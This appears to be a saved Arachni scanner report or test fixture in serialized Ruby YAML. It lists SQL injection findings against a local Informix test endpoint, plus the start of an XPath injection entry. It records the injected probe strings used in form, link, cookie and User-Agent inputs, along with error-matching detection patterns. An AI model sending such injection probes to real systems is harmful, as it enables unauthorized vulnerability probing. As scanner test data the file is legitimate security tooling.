U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/informix/form/append
:verification:
:id: com.informix.jdbc
var: input
url: http://localhost:7362/informix/form/append
injected: default'`--
id: com.informix.jdbc
regexp: (?i-mx:com\.informix\.jdbc)
regexp_match: com.informix.jdbc
elem: form
remarks: {}
method: GET
response: ! 'An illegal character has been found in the statement
com.informix.jdbc
Exception stuff Informix
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1MSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/informix/form/flip
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:com\.informix\.jdbc)
:match: com.informix.jdbc
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: Parameter flip
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/informix/form/flip
:verification:
:id: com.informix.jdbc
var: Parameter flip
url: http://localhost:7362/informix/form/flip
injected: ''
id: com.informix.jdbc
regexp: (?i-mx:com\.informix\.jdbc)
regexp_match: com.informix.jdbc
elem: form
remarks: {}
method: GET
response: ! '["An illegal character has been found in the statement\ncom.informix.jdbc\nException
stuff Informix\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA4
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1MSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/informix/link/append?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:com\.informix\.jdbc)
:match: com.informix.jdbc
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default)
:follow_location: true
:injected: default)
:combo:
!binary "aW5wdXQ=": default)
:action: http://localhost:7362/informix/link/append?input=default
:verification:
:id: com.informix.jdbc
var: input
url: http://localhost:7362/informix/link/append?input=default
injected: default)
id: com.informix.jdbc
regexp: (?i-mx:com\.informix\.jdbc)
regexp_match: com.informix.jdbc
elem: link
remarks: {}
method: GET
response: ! 'An illegal character has been found in the statement
com.informix.jdbc
Exception stuff Informix
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1MiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/informix/link/flip?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:com\.informix\.jdbc)
:match: com.informix.jdbc
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: Parameter flip
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/informix/link/flip?input=default
:verification:
:id: com.informix.jdbc
var: Parameter flip
url: http://localhost:7362/informix/link/flip?input=default
injected: ''
id: com.informix.jdbc
regexp: (?i-mx:com\.informix\.jdbc)
regexp_match: com.informix.jdbc
elem: link
remarks: {}
method: GET
response: ! '["An illegal character has been found in the statement\ncom.informix.jdbc\nException
stuff Informix\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA4
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1MiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/informix/cookie/flip
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:com\.informix\.jdbc)
:match: com.informix.jdbc
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: Parameter flip
:element: cookie
:params: {}
:follow_location: true
:cookies:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/informix/cookie/flip
:verification:
:id: com.informix.jdbc
var: Parameter flip
url: http://localhost:7362/informix/cookie/flip
injected: ''
id: com.informix.jdbc
regexp: (?i-mx:com\.informix\.jdbc)
regexp_match: com.informix.jdbc
elem: cookie
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! '[nil, "An illegal character has been found in the statement\ncom.informix.jdbc\nException
stuff Informix\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA4
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1NCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: cookie2
url: http://localhost:7362/informix/cookie/append
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:com\.informix\.jdbc)
:match: com.informix.jdbc
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value'`--
:injected: cookie value'`--
:combo:
!binary "Y29va2llMg==": cookie value'`--
:action: http://localhost:7362/informix/cookie/append
:verification:
:id: com.informix.jdbc
var: cookie2
url: http://localhost:7362/informix/cookie/append
injected: cookie value'`--
id: com.informix.jdbc
regexp: (?i-mx:com\.informix\.jdbc)
regexp_match: com.informix.jdbc
elem: cookie
remarks: {}
method: GET
response: ! 'An illegal character has been found in the statement
com.informix.jdbc
Exception stuff Informix
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value'`--
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTo1NCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: User-Agent
url: http://localhost:7362/informix/header/append
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:com\.informix\.jdbc)
:match: com.informix.jdbc
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user'`--
:injected: arachni_user'`--
:combo:
User-Agent: arachni_user'`--
:action: http://localhost:7362/informix/header/append
:verification:
:id: com.informix.jdbc
var: User-Agent
url: http://localhost:7362/informix/header/append
injected: arachni_user'`--
id: com.informix.jdbc
regexp: (?i-mx:com\.informix\.jdbc)
regexp_match: com.informix.jdbc
elem: header
remarks: {}
method: GET
response: ! 'An illegal character has been found in the statement
com.informix.jdbc
Exception stuff Informix
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user'`--
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjowNSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/informix/header/flip
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:com\.informix\.jdbc)
:match: com.informix.jdbc
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: header
:params:
:follow_location: true
:headers:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/informix/header/flip
:verification:
:id: com.informix.jdbc
var: Parameter flip
url: http://localhost:7362/informix/header/flip
injected: ''
id: com.informix.jdbc
regexp: (?i-mx:com\.informix\.jdbc)
regexp_match: com.informix.jdbc
elem: header
remarks: {}
method: GET
response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, "An illegal character has been found in the statement\ncom.informix.jdbc\nException
stuff Informix\n", nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjUz
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNjoxMCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
var: input
url: http://localhost:13111/general/form/append
elem: form
method: GET
name: XPath Injection
description: XPath queries can be injected into the web application.
tags:
- xpath
- database
- error
- injection
- regexp
cwe: '91'
cwe_url: http://cwe.mitre.org/data/definitions/91.html
severity: High
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
mod_name: XPath Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/XPATH_Injection
opts:
:redundant: false
:async: true
:regexp: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
:match: !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
:substring:
- !binary |-
eG1sWFBhdGhFdmFsOiBldmFsdWF0aW9uIGZhaWxlZA==
- !binary |-
U2ltcGxlWE1MRWxlbWVudDo6eHBhdGgoKQ==
- !binary |-
WFBhdGhFeGNlcHRpb24=
- !binary |-
TVMuSW50ZXJuYWwuWG1sLg==
- !binary |-
VW5rbm93biBlcnJvciBpbiBYUGF0aA==
- !binary |-
b3JnLmFwYWNoZS54cGF0aC5YUGF0aA==
- !binary |-
QSBjbG9zaW5nIGJyYWNrZXQgZXhwZWN0ZWQgaW4=
- !binary |-
QW4gb3BlcmFuZCBpbiBVbmlvbiBFeHByZXNzaW9uIGRvZXMgbm90IHByb2R1
Y2UgYSBub2RlLXNldA==
- !binary |-
